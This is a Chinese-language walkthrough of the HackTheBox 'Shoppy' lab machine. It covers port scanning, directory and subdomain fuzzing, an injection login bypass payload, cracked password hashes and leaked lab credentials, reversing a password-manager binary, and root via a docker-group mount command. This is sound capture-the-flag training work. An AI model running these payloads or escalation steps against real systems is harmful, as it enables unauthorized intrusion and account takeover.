HTB-Shoppy
一、思路概要
信息收集目录枚举得到
/login
页面;万能密码登录
/login
页面;再次万能密码拿到
josh
账户(非ssh账户);枚举子域得到
mattermost
子域;josh
账户登录mattermost
子域并分析页面拿到ssh账户;连上ssh账户
sudo -l
发现可执行文件;逆向分析可执行文件拿到
deploy
账户;docker提权获取root权限。
二、信息收集
nmap(用如下两步,先扫全端口,再指定端口定向扫描服务、版本相关信息,有助于提升扫描速度)
┌──(root💀kali)-[~/Desktop]
└─# nmap -p- --min-rate 10000 10.129.92.247
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:15 EDT
Nmap scan report for 10.129.92.247
Host is up (0.33s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9093/tcp open copycat
Nmap done: 1 IP address (1 host up) scanned in 9.05 seconds
┌──(root💀kali)-[~/Desktop]
└─# nmap -p 22,80,9093 -sCV 10.129.92.247
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:24 EDT
Nmap scan report for 10.129.92.247
Host is up (0.32s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open http nginx 1.23.1
|_http-server-header: nginx/1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
9093/tcp open copycat?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Fri, 31 Mar 2023 08:24:50 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 15
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 15
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 2.8824e-05
| go_gc_duration_seconds{quantile="0.25"} 7.6212e-05
| go_gc_d
| HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Fri, 31 Mar 2023 08:24:51 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 15
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 15
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 2.8824e-05
| go_gc_duration_seconds{quantile="0.25"} 7.6212e-05
|_ go_gc_d
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9093-TCP:V=7.91%I=7%D=3/31%Time=642698D4%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,152D,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/plain;\x20version=0\.0\.4;\x20charset=utf-8\r\nDate:\x20Fri,\x2
SF:031\x20Mar\x202023\x2008:24:50\x20GMT\r\n\r\n#\x20HELP\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x
SF:20generated\x20by\x20the\x20Go\x20runtime\.\n#\x20TYPE\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20counter\ngo_gc_cycles_automatic_gc_cycles_
SF:total\x2015\n#\x20HELP\x20go_gc_cycles_forced_gc_cycles_total\x20Count\
SF:x20of\x20completed\x20GC\x20cycles\x20forced\x20by\x20the\x20applicatio
SF:n\.\n#\x20TYPE\x20go_gc_cycles_forced_gc_cycles_total\x20counter\ngo_gc
SF:_cycles_forced_gc_cycles_total\x200\n#\x20HELP\x20go_gc_cycles_total_gc
SF:_cycles_total\x20Count\x20of\x20all\x20completed\x20GC\x20cycles\.\n#\x
SF:20TYPE\x20go_gc_cycles_total_gc_cycles_total\x20counter\ngo_gc_cycles_t
SF:otal_gc_cycles_total\x2015\n#\x20HELP\x20go_gc_duration_seconds\x20A\x2
SF:0summary\x20of\x20the\x20pause\x20duration\x20of\x20garbage\x20collecti
SF:on\x20cycles\.\n#\x20TYPE\x20go_gc_duration_seconds\x20summary\ngo_gc_d
SF:uration_seconds{quantile=\"0\"}\x202\.8824e-05\ngo_gc_duration_seconds{
SF:quantile=\"0\.25\"}\x207\.6212e-05\ngo_gc_d")%r(HTTPOptions,1A5A,"HTTP/
SF:1\.0\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20version=0\.0\.4;\x
SF:20charset=utf-8\r\nDate:\x20Fri,\x2031\x20Mar\x202023\x2008:24:51\x20GM
SF:T\r\n\r\n#\x20HELP\x20go_gc_cycles_automatic_gc_cycles_total\x20Count\x
SF:20of\x20completed\x20GC\x20cycles\x20generated\x20by\x20the\x20Go\x20ru
SF:ntime\.\n#\x20TYPE\x20go_gc_cycles_automatic_gc_cycles_total\x20counter
SF:\ngo_gc_cycles_automatic_gc_cycles_total\x2015\n#\x20HELP\x20go_gc_cycl
SF:es_forced_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x
SF:20forced\x20by\x20the\x20application\.\n#\x20TYPE\x20go_gc_cycles_force
SF:d_gc_cycles_total\x20counter\ngo_gc_cycles_forced_gc_cycles_total\x200\
SF:n#\x20HELP\x20go_gc_cycles_total_gc_cycles_total\x20Count\x20of\x20all\
SF:x20completed\x20GC\x20cycles\.\n#\x20TYPE\x20go_gc_cycles_total_gc_cycl
SF:es_total\x20counter\ngo_gc_cycles_total_gc_cycles_total\x2015\n#\x20HEL
SF:P\x20go_gc_duration_seconds\x20A\x20summary\x20of\x20the\x20pause\x20du
SF:ration\x20of\x20garbage\x20collection\x20cycles\.\n#\x20TYPE\x20go_gc_d
SF:uration_seconds\x20summary\ngo_gc_duration_seconds{quantile=\"0\"}\x202
SF:\.8824e-05\ngo_gc_duration_seconds{quantile=\"0\.25\"}\x207\.6212e-05\n
SF:go_gc_d");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.77 seconds
开放端口:22(ssh)、80(http)、9093(copycat),获得域名shoppy.htb
将域名添加进本地hosts文件
echo "10.129.92.247 shoppy.htb" >> /etc/hosts
浏览器打开shoppy.htb

枚举子目录
┌──(root💀kali)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -t 100 -mc 200,302,301 -u http://shoppy.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://shoppy.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,302,301
________________________________________________
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 413ms]
* FUZZ: admin
[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 414ms]
* FUZZ: images
[Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 417ms]
* FUZZ: js
[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 435ms]
* FUZZ: assets
[Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 441ms]
* FUZZ: css
[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 468ms]
* FUZZ: login
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 323ms]
* FUZZ: Admin
[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 429ms]
* FUZZ: Login
[Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 335ms]
* FUZZ: fonts
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 327ms]
* FUZZ: ADMIN
[Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 332ms]
* FUZZ: exports
[Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 376ms]
* FUZZ:
[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 330ms]
* FUZZ: LOGIN
:: Progress: [20116/20116] :: Job [1/1] :: 282 req/sec :: Duration: [0:01:06] :: Errors: 0 ::
枚举到的目录,301的页面都没东西,302的都重定向到/login
目录
三、万能密码
访问shoppy.htb/login
用户名输入如下,密码任意(万能密码),成功登录
admin'||'1==1

点击页面右上角搜索标签,再次输入万能密码,弹出如下Download export
标签
点击Download export
标签,得到两组账户,admin
和josh

[{
"_id": "62db0e93d6d6a999a66ee67a",
"username": "admin",
"password": "23c6877d9e2b564ef8b32c3a23de27b2"
},
{
"_id": "62db0e93d6d6a999a66ee67b",
"username": "josh",
"password": "6ebcea65320589ca4f2f1ce039975995"
}]
破解hash:https://crackstation.net/
josh
remembermethisway
用该账户登录ssh,不对
遂用wfuzz枚举子域名,发现很多301
┌──(root💀kali)-[~/Desktop]
└─# wfuzz -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.129.92.247/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 301 7 L 11 W 169 Ch "www"
000000020: 301 7 L 11 W 169 Ch "www2"
000000019: 301 7 L 11 W 169 Ch "dev"
000000015: 301 7 L 11 W 169 Ch "ns"
000000003: 301 7 L 11 W 169 Ch "ftp"
000000021: 301 7 L 11 W 169 Ch "ns3"
000000022: 301 7 L 11 W 169 Ch "pop3"
000000018: 301 7 L 11 W 169 Ch "blog"
......
再用ffuf提速枚举子域名(wfuzz这个速度有点窒息,用ffuf或gobuster提速),并且换个大字典,过滤301响应
┌──(root💀kali)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -fc 301
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.92.247
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.shoppy.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 301
________________________________________________
[Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 318ms]
* FUZZ: mattermost
:: Progress: [100000/100000] :: Job [1/1] :: 100 req/sec :: Duration: [0:13:49] :: Errors: 0 ::
发现mattermost
子域名,添加进本地hosts文件
echo "10.129.92.247 mattermost.shoppy.htb" >> /etc/hosts
访问mattermost.shoppy.htb

用刚刚的josh
账户登录,在左侧Deploy Machine
栏,聊天记录里发现jaeger
账户

username: jaeger
password: Sh0ppyBest@pp!
ssh连上(IP有变化是因为重启了靶机环境)
┌──(root💀kali)-[~/Desktop]
└─# ssh jaeger@10.129.93.16
jaeger@10.129.93.16's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
jaeger@shoppy:~$ pwd
/home/jaeger
用sudo -l
查看此用户权限
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager
发现可执行命令/home/deploy/password-manager
,用如下步骤下载到本地
在ssh窗口开启http服务
jaeger@shoppy:/home/deploy$ python3 -m http.server 9898
Serving HTTP on 0.0.0.0 port 9898 (http://0.0.0.0:9898/) ...
然后在本地用如下命令下载
wget http://10.129.93.16:9898/password-manager
本地用file
命令查看文件信息
┌──(root💀kali)-[~/Desktop]
└─# file password-manager
password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped
是64位ELF(Executable and Linkable Format)文件
四、逆向分析
用radare2
工具逆向静态分析一下
参考:https://blog.csdn.net/qq_28429161/article/details/107810534
r2 password-manager
输入如下指令,定位main
函数地址
> aaa #自动分析并命名函数
> afl #查看程序内的函数
找到main
函数,然后定位到main函数的地址并查看汇编代码
> s main //定位到main函数入口
> pdf //查看当前函数的汇编代码
如上图,int main()
和域运算符::
表明这是C++程序,运行会先打印Welcome to Josh password manager!
然后打印Please enter your master password:
,并接收键盘输入,如下图
然后将键盘输入与Sample
逐一字符对比
对比相同后,会打印Access granted! Here is creds !
,然后调用system()
函数执行cat
命令,查看/home/deploy/creds.txt
内容
回到靶机ssh窗口,运行如下命令,提示Please enter your master password:
时,输入Sample
jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager
[sudo] password for jaeger:
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
可看到已得到账户deploy
的用户名密码,执行su deploy
切换到deploy账户

看到deploy用户属于docker
组,在如下网站搜索docker
https://gtfobins.github.io/
五、docker提权
看到如下提权命令

为了让获得的shell环境更稳定,把后面的sh
换成bash
,执行
deploy@shoppy:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt bash
成功获取root权限

Over!
